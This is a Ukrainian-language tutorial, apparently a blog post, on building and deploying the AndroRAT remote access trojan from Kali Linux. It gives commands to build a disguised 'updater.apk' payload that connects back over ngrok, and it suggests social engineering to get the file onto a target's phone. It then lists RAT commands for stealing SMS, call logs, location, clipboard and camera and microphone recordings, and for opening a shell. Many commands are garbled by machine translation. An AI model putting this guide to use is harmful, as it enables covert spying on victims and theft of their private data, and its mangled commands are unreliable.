спосіб віддаленого контролю телефону за допомогою AndroRAT та Kali Linux.
Встановить АндроРАТ на Kali Linux.
Встановити та налаштувати ngrok.
Створити корисне навантаження (файл .apk, що виконується).
Встановити apk файл на цільовий пристрій.
AndroRAT (Remote Access Tool/Trojan. AndroRAT) – призначений для віддаленого керування телефоном Android. Це клієнт-серверна програма, розроблена на Java Android для клієнтської частини, а серверна частина написана на Python.
Інструмент працюватиме на пристроях від Android 4.1 (Jellybean), Android 9 (Oreo), (від API 16 до API 28). Цей RAT може бути встановлений на Android 10 і вище , але деякі команди для отримання інформації можуть працювати не зовсім стабільно.
Бекдор (автоматичне підключення).
Невидимий значок після встановлення.
Використовує мінімальні ресурси пристрою.
Автоматичний запуск після перезавантаження смартфона.
Можливість робити знімки з обох камер
Аудіо запис з мікрофона.
Перегляд журналу дзвінків та SMS.
Отримання поточного розташування.
Інформація про SIM-картку, IP-адресу та MAC-адресу пристрою.
Для роботи Андроїд потрібен Python3. Для встановлення Python3 на Kali, використовуйте команду:
sudo apt встановити python3 python3 - pip
Тепер необхідно встановити Java OpenJDK:
Зайдіть на офіційний сайт Oracle, створіть обліковий запис Oracle і увійдіть за допомогою даних облікового запису.
Після реєстрації та входу в систему перейдіть на сторінку завантаження OpenJDK . Перейдіть вниз і знайдіть версію OpenJDK 8.
Позначивши галочкою ліцензійну угоду, натисніть посилання jdk-8u321-linux-x64.tar.gz .
Після закінчення завантаження відкрийте термінал і зайдіть в /usr/lib/jvm:
cd / usr / lib / jvm
Якщо в системі не встановлені інші версії Java, тоді доведеться створити каталог jvm /usr/lib:
sudo mkdir - p / usr / lib / jvm
Вийміть архів OpenJDK:
sudo tar - xvzf ~ / Завантаження / jdk - 8 u321 - linux - x64 . дьоготь . gz
Після вилучення файлів, перейдіть до каталогу jdk1.8.0_321 :
cd jdk1 . 8,0 _321
Тепер необхідно змінити змінні середовища Java за допомогою текстового редактора (у моєму випадку використовується текстовий редактор Nano):
sudo nano / etc / середовище
На скрині вище видно, деякі шляхи вже встановлені. Додати інші використовуючи символ : :
/usr/lib/jvm/jdk1.8.0_321/bin:/usr/lib/jvm/jdk1.8.0_321/db/bin:/usr/lib/jvm/jdk1.8.0_321/jre/bin
Збережіть зміни за допомогою клавіш «CTRL+X», потім «Y» та «Enter».
Встановіть OpenJDK 8 як альтернативу:
sudo update - альтернативи -- встановити "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_321/bin/java" 0
Встановіть компілятор Java:
sudo update - альтернативи -- встановити "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_321/bin/javac" 0
Тепер можна встановити Java OpenJDK 8:
sudo update - alternatives — встановити java / usr / lib / jvm / jdk1 . 8.0 _321 / bin / java
Для компілятора Java використовуйте команду:
sudo update - alternatives — встановити java / usr / lib / jvm / jdk1 . 8.0 _321 / bin / javac
Виведення цих команд показано на наступному знімку екрана:
Виберіть версію Java (зробити це можна з будь-якого каталогу):
sudo update - альтернативи -- config java
На наведеному вище знімку екрана ви побачите, що версія Java 8 знаходиться під номером 2 , а версія Java 11 – під номером 0 .
Щоб переключитися між версіями, виберіть відповідний номер. У моєму випадку - це 2 :
Добре, тепер у нас використовується Java 8, йдемо далі!
git clone https : // github . com / karma9874 / AndroRAT
Переходимо до каталогу AndroRAT за допомогою команди mv:
Встановлюємо залежності AndroRAT:
Вимоги pip3 install - r . txt
Після цього потрібно встановити ngrok та встановити токен аутентифікації ngrok.
Для створення файлу APK потрібно виконати команду:
python3 androRAT . py -- build -- ngrok - p 8888 - o ~ / Desktop / updater . apk
Аргумент --build , що використовується в команді, використовує скрипт python androRAT.py і створює корисне навантаження (файл .apk). Аргумент -ngrok використовується для віддаленого підключення через ngrok.
У локальній мережі можна використовувати ngrok і запустити команду з параметром -i. Після чого буде запущено слухача, який очікує зворотного підключення.
Для вибору іконки програми можна використати аргумент --icon . У моєму випадку я хочу отримати прихований віддалений доступ до смартфону, тому пропускаю це налаштування.
Параметр -o відповідає за вибір порту та розташування файлу .apk.
На скрині вище бачимо, що AndroRAT створює і підписує файл .apk. Після створення файлу буде запущено прослуховувач, який очікує підключення:
Тепер можна надіслати apk файл на смартфон. Якщо у вас немає фізичного доступу до пристрою, тоді можна застосувати методи соціальної інженерії .
Наприклад, встановимо АндроРАТ на свій персональний планшет. Після встановлення файлу на цільовому пристрої ви побачите наступне повідомлення в терміналі Kali:
З'єднання встановлено. Тепер для взаємодії з програмою будемо використовувати команди:
deviceInfo – основна інформація про пристрій.
camList – ідентифікатор камери.
takepic [ідентифікатор камери] – знімок з камери.
startVideo [ID камери] — запис відео.
stopVideo — Зупинити запис відео та відкрити відеофайл.
startAudio — запись звука.
stopAudio — Зупинити запис звуку.
getSMS [inbox|sent] - вхідні / надіслані смс.
getCallLogs - історія дзвінків.
shell – запуск оболонки sh.
vibrate [количество_раз] — вибрация.
getLocation — розташування пристрою.
getIP — ip-пристрої.
getSimDetails - інформація про всі sim-картки.
clear – очищення екрана.
getClipData – дані з буфера обміну.
getMACAddress — mac-адреса пристрою.
exit – вихід.
Наприклад, для отримання всіх SMS запустимо команду getSMS:
На скрині вище, можете бачити, як були отримані всі SMS та збережені у файл .txt, в каталозі «Dumps»
Так само, якщо ми хочемо зробити знімок з камери, потрібно запустити команду camList . Після цього з'явиться список усіх камер телефону. Потім можна зробити знімок за допомогою команди
takepic [ номер камери ]
